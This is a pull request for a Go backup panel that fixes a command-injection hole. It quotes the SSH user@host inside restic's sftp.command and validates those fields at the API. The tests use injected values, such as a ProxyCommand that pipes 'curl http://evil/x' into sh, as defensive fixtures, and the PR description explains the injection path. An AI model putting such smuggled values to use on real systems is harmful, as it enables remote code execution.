### PR TITLE
fix(backup): quote user@host in the restic sftp.command, and validate them

### DIFF
--- a/internal/backup/sftpopts.go
+++ b/internal/backup/sftpopts.go
@@ -83,7 +83,13 @@ func SFTPCommandFlag(in SFTPInputs) string {
 	if in.Port > 0 && in.Port != 22 {
 		parts = append(parts, "-p", fmt.Sprintf("%d", in.Port))
 	}
-	parts = append(parts, fmt.Sprintf("%s@%s", in.User, in.Host), "-s", "sftp")
+	// Quote user@host like KeyPath above. restic tokenizes sftp.command on
+	// whitespace and then EXECUTES it, so an unquoted value containing spaces
+	// splits into extra argv entries -- a user of
+	// `u -o ProxyCommand=<cmd>` would hand ssh its own options, and
+	// ProxyCommand runs through a shell. KeyPath was already quoted here; user
+	// and host were the gap.
+	parts = append(parts, shellQuote(fmt.Sprintf("%s@%s", in.User, in.Host)), "-s", "sftp")
 	return "sftp.command=" + strings.Join(parts, " ")
 }
 

--- a/internal/backup/sftpopts_quoting_test.go
+++ b/internal/backup/sftpopts_quoting_test.go
@@ -1,0 +1,67 @@
+package backup
+
+import (
+	"strings"
+	"testing"
+)
+
+// SFTPCommandFlag builds the `-o sftp.command=...` value restic tokenizes on
+// whitespace and then executes. KeyPath was already shellQuote'd; user and host
+// were interpolated raw via fmt.Sprintf("%s@%s"), so whitespace in either split
+// into extra ssh argv entries — and `-o ProxyCommand=` runs through a shell.
+//
+// The API boundary now rejects these too, but this layer has to hold on its
+// own: it is the last thing between a stored destination row and an exec.
+func TestSFTPCommandFlag_QuotesUserAndHost(t *testing.T) {
+	t.Parallel()
+
+	flag := SFTPCommandFlag(SFTPInputs{
+		User: "u -o ProxyCommand=curl http://evil/x|sh",
+		Host: "example.com",
+		Auth: "password",
+		Path: "/backups",
+	})
+	if flag == "" {
+		t.Fatal("expected a command flag for password auth")
+	}
+
+	// The injected options must not appear as free-standing tokens. If the
+	// value were unquoted, "-o" and "ProxyCommand=..." would each be their own
+	// argv entry once restic tokenizes on spaces.
+	body := strings.TrimPrefix(flag, "sftp.command=")
+	if !strings.Contains(body, "'u -o ProxyCommand=curl http://evil/x|sh@example.com'") {
+		t.Errorf("user@host was not quoted as a single token:\n%s", body)
+	}
+}
+
+func TestSFTPCommandFlag_LeavesOrdinaryValuesUnquoted(t *testing.T) {
+	t.Parallel()
+
+	flag := SFTPCommandFlag(SFTPInputs{
+		User: "bkp-user",
+		Host: "backup.example.com",
+		Auth: "password",
+		Path: "/backups",
+	})
+	if !strings.Contains(flag, "bkp-user@backup.example.com") {
+		t.Errorf("ordinary user@host should pass through unquoted:\n%s", flag)
+	}
+	if strings.Contains(flag, "'bkp-user@backup.example.com'") {
+		t.Errorf("ordinary user@host was needlessly quoted:\n%s", flag)
+	}
+}
+
+// A whitespace-free value cannot split into extra argv entries, so shellQuote
+// deliberately leaves it alone. Pinned so nobody "fixes" shellQuote into
+// quoting everything and changes the flag for every existing destination.
+func TestSFTPCommandFlag_KeyPathStillQuotedWhenSpaced(t *testing.T) {
+	t.Parallel()
+
+	flag := SFTPCommandFlag(SFTPInputs{
+		User: "u", Host: "h", Auth: "key",
+		KeyPath: "/etc/keys/my key.pem",
+	})
+	if !strings.Contains(flag, "'/etc/keys/my key.pem'") {
+		t.Errorf("spaced key path lost its quoting:\n%s", flag)
+	}
+}

--- a/panel-api/internal/api/backup_destinations.go
+++ b/panel-api/internal/api/backup_destinations.go
@@ -14,6 +14,7 @@ import (
 	"errors"
 	"fmt"
 	"net/http"
+	"regexp"
 	"strings"
 	"time"
 
@@ -282,11 +283,25 @@ func (h *backupDestinationHandler) create(c *gin.Context) {
 	c.JSON(http.StatusCreated, toDestDTO(d))
 }
 
+// sftpUnsafeRe matches anything that must never appear in an SSH host or
+// username: whitespace (which would split the sftp.command into extra argv
+// entries) plus the usual shell metacharacters.
+var sftpUnsafeRe = regexp.MustCompile("[\\s'\"\\\\;|&$<>()`]")
+
 // validateSFTPInputs enforces non-empty host+user, non-empty path, and
 // auth ∈ {key, password}. Key path absolute when auth=key.
 func validateSFTPInputs(s *sftpRequestOptions) error {
 	if s.Host == "" || s.User == "" {
 		return errors.New("host and user are required")
+	}
+	// Host and user end up inside the restic `-o sftp.command=...` string,
+	// which restic tokenizes on whitespace and executes. SFTPCommandFlag quotes
+	// them, but validate here too: a value carrying whitespace or shell
+	// metacharacters has no legitimate meaning as an SSH host or username, and
+	// CONVENTIONS.md asks for the check at the boundary rather than relying on
+	// one downstream helper staying correct forever.
+	if sftpUnsafeRe.MatchString(s.Host) || sftpUnsafeRe.MatchString(s.User) {
+		return errors.New("host and user must not contain whitespace or shell metacharacters")
 	}
 	if s.Path == "" {
 		return errors.New("path is required")
@@ -614,5 +629,3 @@ func (h *backupDestinationHandler) resolveOldPassword(ctx context.Context, dest 
 	}
 	return resp.Password, nil
 }
-
-

--- a/panel-api/internal/api/backup_destinations_sftp_validation_test.go
+++ b/panel-api/internal/api/backup_destinations_sftp_validation_test.go
@@ -1,0 +1,68 @@
+package api
+
+import "testing"
+
+// SFTP host and user end up inside the restic `-o sftp.command=...` string,
+// which restic tokenizes on whitespace and then EXECUTES. Before this,
+// validateSFTPInputs only checked they were non-empty, and SFTPCommandFlag
+// interpolated them with a bare fmt.Sprintf("%s@%s") while quoting KeyPath
+// immediately above — so a user of `u -o ProxyCommand=<cmd>` would split into
+// extra ssh argv entries, and ProxyCommand runs through a shell.
+//
+// Admin-gated (/api/v1/admin/backup-destinations behind RequireAdmin), so this
+// was a stored footgun rather than privilege escalation — an admin already has
+// root through the agent. It is worth blocking because the value persists and
+// fires later during unattended scheduled backups.
+func TestValidateSFTPInputs_RejectsInjectableHostAndUser(t *testing.T) {
+	t.Parallel()
+
+	legit := []string{
+		"backup.example.com",
+		"192.0.2.10",
+		"bkp-user",
+		"normal_user-1.2",
+		"host123",
+	}
+	for _, v := range legit {
+		t.Run("accepts host "+v, func(t *testing.T) {
+			err := validateSFTPInputs(&sftpRequestOptions{Host: v, User: "u", Path: "/backups"})
+			if err != nil {
+				t.Errorf("rejected a legitimate host %q: %v", v, err)
+			}
+		})
+		t.Run("accepts user "+v, func(t *testing.T) {
+			err := validateSFTPInputs(&sftpRequestOptions{Host: "h", User: v, Path: "/backups"})
+			if err != nil {
+				t.Errorf("rejected a legitimate user %q: %v", v, err)
+			}
+		})
+	}
+
+	nasty := []struct{ name, val string }{
+		{"argv split into ssh options", "u -o ProxyCommand=curl http://x|sh"},
+		{"tab split", "u\t-oProxyCommand=x"},
+		{"newline", "u\nx"},
+		{"semicolon", "a;b"},
+		{"pipe", "a|b"},
+		{"ampersand", "a&b"},
+		{"dollar", "a$b"},
+		{"backtick", "a`id`"},
+		{"single quote", "a'b"},
+		{"double quote", `a"b`},
+		{"backslash", `a\b`},
+		{"redirect", "a>b"},
+		{"subshell parens", "a(b)"},
+	}
+	for _, tc := range nasty {
+		t.Run("host/"+tc.name, func(t *testing.T) {
+			if err := validateSFTPInputs(&sftpRequestOptions{Host: tc.val, User: "u", Path: "/b"}); err == nil {
+				t.Errorf("accepted host %q — it reaches an executed sftp.command", tc.val)
+			}
+		})
+		t.Run("user/"+tc.name, func(t *testing.T) {
+			if err := validateSFTPInputs(&sftpRequestOptions{Host: "h", User: tc.val, Path: "/b"}); err == nil {
+				t.Errorf("accepted user %q — it reaches an executed sftp.command", tc.val)
+			}
+		})
+	}
+}


### PR DESCRIPTION
Second finding from the backup/restore audit.

## What

`SFTPCommandFlag` builds the `-o sftp.command=...` value that restic tokenizes on whitespace and then **executes**. `KeyPath` was `shellQuote`'d — and one line below it:

```go
parts = append(parts, fmt.Sprintf("%s@%s", in.User, in.Host), "-s", "sftp")
```

user and host went in raw. And `validateSFTPInputs` only checked they were non-empty:

```go
if s.Host == "" || s.User == "" {
    return errors.New("host and user are required")
}
```

So a destination stored with user `u -o ProxyCommand=<cmd>` splits into extra `ssh` argv entries, and `ProxyCommand` runs through a shell.

## Scope — a stored footgun, not privilege escalation

`/api/v1/admin/backup-destinations` sits behind `RequireAdmin`, and an admin already has root through the agent. I'm not going to dress this up as an escalation.

It's worth closing anyway:

- The value **persists in the DB and fires later**, during unattended scheduled backups — the blast radius outlives the session that set it.
- `KeyPath` being quoted immediately above shows this was an oversight, not a considered decision.
- It converts an admin-account compromise, or any chain that reaches that one endpoint, into persistent root execution.

One angle I did **not** fully resolve: `user_token_scopes.go` maps `/api/v1/backup-destinations` to the `backups` scope, but the real route is `/api/v1/admin/backup-destinations`. Whether an admin's `backups`-scoped token can reach the admin path depends on that matcher, and I didn't chase it to a conclusion. If it can, a token deliberately narrowed to "backups" would grant root execution, which would be a genuine scope escalation. Worth someone confirming.

## Fixed on both sides

Per CONVENTIONS.md, rather than relying on one helper staying correct:

- `SFTPCommandFlag` quotes `user@host`, so the layer that actually execs holds on its own.
- `validateSFTPInputs` rejects whitespace and shell metacharacters, which have no legitimate meaning in an SSH host or username.

Ordinary values are deliberately **not** quoted — a whitespace-free string can't split into extra argv entries, and quoting unconditionally would change the flag for every existing destination. There's a test pinning that, so nobody later "fixes" `shellQuote` into quoting everything.

## Tests

```
accepts: backup.example.com  192.0.2.10  bkp-user  normal_user-1.2  host123
blocks : argv split, tab, newline, ; | & $ ` ' " \ > ( )
```

…on both host and user, plus quoting tests at the `SFTPCommandFlag` layer.

The **five pre-existing `SFTPCommandFlag` tests still pass unchanged**, which is the check that matters here: the wire shape for existing destinations is untouched.

Full `panel-api` / `panel-agent` / `internal` suites green, `go vet` clean.
